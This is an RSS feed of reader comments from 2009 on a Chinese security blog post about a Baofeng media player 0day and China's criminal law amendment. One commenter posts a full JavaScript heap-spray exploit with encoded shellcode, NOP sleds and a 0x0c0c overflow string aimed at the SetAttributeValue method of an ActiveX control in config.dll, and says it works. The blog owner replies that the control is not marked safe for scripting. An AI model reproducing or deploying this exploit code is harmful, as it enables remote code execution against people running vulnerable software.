<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>评论：暴风影音0day和刑法修正案</title>
	<atom:link href="http://baoz.net/baofeng0-0day-law/feed/" rel="self" type="application/rss+xml" />
	<link>http://baoz.net/baofeng0-0day-law/</link>
	<description>己所不欲勿劝他人</description>
	<lastBuildDate>Fri, 12 Mar 2010 06:24:36 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>来自：baoz</title>
		<link>http://baoz.net/baofeng0-0day-law/comment-page-1/#comment-436</link>
		<dc:creator>baoz</dc:creator>
		<pubDate>Thu, 07 May 2009 14:35:06 +0000</pubDate>
		<guid isPermaLink="false">http://baoz.net/?p=2022#comment-436</guid>
		<description>指导不敢当，互相学习 ：）</description>
		<content:encoded><![CDATA[<p>指导不敢当，互相学习 ：）</p>
]]></content:encoded>
	</item>
	<item>
		<title>来自：3erty</title>
		<link>http://baoz.net/baofeng0-0day-law/comment-page-1/#comment-435</link>
		<dc:creator>3erty</dc:creator>
		<pubDate>Thu, 07 May 2009 07:48:12 +0000</pubDate>
		<guid isPermaLink="false">http://baoz.net/?p=2022#comment-435</guid>
		<description>好，多谢指导</description>
		<content:encoded><![CDATA[<p>好，多谢指导</p>
]]></content:encoded>
	</item>
	<item>
		<title>来自：baoz</title>
		<link>http://baoz.net/baofeng0-0day-law/comment-page-1/#comment-433</link>
		<dc:creator>baoz</dc:creator>
		<pubDate>Thu, 07 May 2009 07:10:21 +0000</pubDate>
		<guid isPermaLink="false">http://baoz.net/?p=2022#comment-433</guid>
		<description>你可以搜索一下 MSDN里有不少描述safe for script和safe for init的的资料。</description>
		<content:encoded><![CDATA[<p>你可以搜索一下 MSDN里有不少描述safe for script和safe for init的的资料。</p>
]]></content:encoded>
	</item>
	<item>
		<title>来自：3erty</title>
		<link>http://baoz.net/baofeng0-0day-law/comment-page-1/#comment-432</link>
		<dc:creator>3erty</dc:creator>
		<pubDate>Thu, 07 May 2009 05:58:36 +0000</pubDate>
		<guid isPermaLink="false">http://baoz.net/?p=2022#comment-432</guid>
		<description>对，的确有这个问题
不是很了解safeforscript，可否提供些资料0_0</description>
		<content:encoded><![CDATA[<p>对，的确有这个问题<br />
不是很了解safeforscript，可否提供些资料0_0</p>
]]></content:encoded>
	</item>
	<item>
		<title>来自：baoz</title>
		<link>http://baoz.net/baofeng0-0day-law/comment-page-1/#comment-430</link>
		<dc:creator>baoz</dc:creator>
		<pubDate>Thu, 07 May 2009 01:34:37 +0000</pubDate>
		<guid isPermaLink="false">http://baoz.net/?p=2022#comment-430</guid>
		<description>你用ie默认的安全级别，把这个js放到外面的服务器上，访问一下，看看会发生什么 ：）
应该会js报错，然后告诉你xxxx方法不可用。</description>
		<content:encoded><![CDATA[<p>你用ie默认的安全级别，把这个js放到外面的服务器上，访问一下，看看会发生什么 ：）<br />
应该会js报错，然后告诉你xxxx方法不可用。</p>
]]></content:encoded>
	</item>
	<item>
		<title>来自：3erty</title>
		<link>http://baoz.net/baofeng0-0day-law/comment-page-1/#comment-427</link>
		<dc:creator>3erty</dc:creator>
		<pubDate>Thu, 07 May 2009 00:30:02 +0000</pubDate>
		<guid isPermaLink="false">http://baoz.net/?p=2022#comment-427</guid>
		<description>




function test()
{
    var shellcode = unescape(&quot;%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063&quot;);
    var bigblock = unescape(&quot;%u9090%u9090&quot;);
    var headersize = 20;
    var slackspace = headersize+shellcode.length;
    while (bigblock.length&lt;slackspace)
    bigblock+=bigblock;
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace&lt;0x40000)
    block = block+block+fillblock;
    memory = new Array();
    for (x=0; x&lt;300; x++)
        memory[x] = block + shellcode;
    var arg2 = &#039;&#039;;
    while (arg2.length &lt;264)
    arg2+=unescape(&quot;%u0c0c&quot;);
    var arg1=&quot;3rty88&quot;;
    var arg3=&quot;3rty88&quot;
    target.SetAttributeValue(arg1,arg2,arg3);
}



可用：）</description>
		<content:encoded><![CDATA[<p>function test()<br />
{<br />
    var shellcode = unescape(&#8220;%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063&#8243;);<br />
    var bigblock = unescape(&#8220;%u9090%u9090&#8243;);<br />
    var headersize = 20;<br />
    var slackspace = headersize+shellcode.length;<br />
    while (bigblock.length&lt;slackspace)<br />
    bigblock+=bigblock;<br />
    fillblock = bigblock.substring(0, slackspace);<br />
    block = bigblock.substring(0, bigblock.length-slackspace);<br />
    while(block.length+slackspace&lt;0&#215;40000)<br />
    block = block+block+fillblock;<br />
    memory = new Array();<br />
    for (x=0; x&lt;300; x++)<br />
        memory[x] = block + shellcode;<br />
    var arg2 = &#8221;;<br />
    while (arg2.length &lt;264)<br />
    arg2+=unescape(&#8220;%u0c0c&#8221;);<br />
    var arg1=&#8221;3rty88&#8243;;<br />
    var arg3=&#8221;3rty88&#8243;<br />
    target.SetAttributeValue(arg1,arg2,arg3);<br />
}</p>
<p>可用：）</p>
]]></content:encoded>
	</item>
	<item>
		<title>来自：baoz</title>
		<link>http://baoz.net/baofeng0-0day-law/comment-page-1/#comment-423</link>
		<dc:creator>baoz</dc:creator>
		<pubDate>Wed, 06 May 2009 15:15:29 +0000</pubDate>
		<guid isPermaLink="false">http://baoz.net/?p=2022#comment-423</guid>
		<description>config.dll的问题不大，safeforscript是false的</description>
		<content:encoded><![CDATA[<p>config.dll的问题不大，safeforscript是false的</p>
]]></content:encoded>
	</item>
	<item>
		<title>来自：3erty</title>
		<link>http://baoz.net/baofeng0-0day-law/comment-page-1/#comment-415</link>
		<dc:creator>3erty</dc:creator>
		<pubDate>Wed, 06 May 2009 07:14:59 +0000</pubDate>
		<guid isPermaLink="false">http://baoz.net/?p=2022#comment-415</guid>
		<description>错了：）应该是

while (bstrAttributeName.length &lt;264)
bstrAttributeName+=unescape(”%u0c0c”);</description>
		<content:encoded><![CDATA[<p>错了：）应该是</p>
<p>while (bstrAttributeName.length &lt;264)<br />
bstrAttributeName+=unescape(”%u0c0c”);</p>
]]></content:encoded>
	</item>
	<item>
		<title>来自：3erty</title>
		<link>http://baoz.net/baofeng0-0day-law/comment-page-1/#comment-414</link>
		<dc:creator>3erty</dc:creator>
		<pubDate>Wed, 06 May 2009 06:49:02 +0000</pubDate>
		<guid isPermaLink="false">http://baoz.net/?p=2022#comment-414</guid>
		<description>config.dll的漏洞仍然没补
SetAttributeValue ( ByVal lpQueryStr As String ,  ByVal bstrAttributeName As String ,  ByVal lpValueStr As String )
第一个参数和第二个参数都有问题
while (bstrAttributeName.length &lt;264)
arg2+=unescape(&quot;%u0c0c&quot;);</description>
		<content:encoded><![CDATA[<p>config.dll的漏洞仍然没补<br />
SetAttributeValue ( ByVal lpQueryStr As String ,  ByVal bstrAttributeName As String ,  ByVal lpValueStr As String )<br />
第一个参数和第二个参数都有问题<br />
while (bstrAttributeName.length &lt;264)<br />
arg2+=unescape(&#8220;%u0c0c&#8221;);</p>
]]></content:encoded>
	</item>
	<item>
		<title>来自：ieraya</title>
		<link>http://baoz.net/baofeng0-0day-law/comment-page-1/#comment-408</link>
		<dc:creator>ieraya</dc:creator>
		<pubDate>Tue, 05 May 2009 23:10:07 +0000</pubDate>
		<guid isPermaLink="false">http://baoz.net/?p=2022#comment-408</guid>
		<description>&lt;a href=&quot;#comment-402&quot; rel=&quot;nofollow&quot;&gt;@void&lt;/a&gt;估计很多人都该毙掉了</description>
		<content:encoded><![CDATA[<p><a href="#comment-402" rel="nofollow">@void</a>估计很多人都该毙掉了</p>
]]></content:encoded>
	</item>
</channel>
</rss>
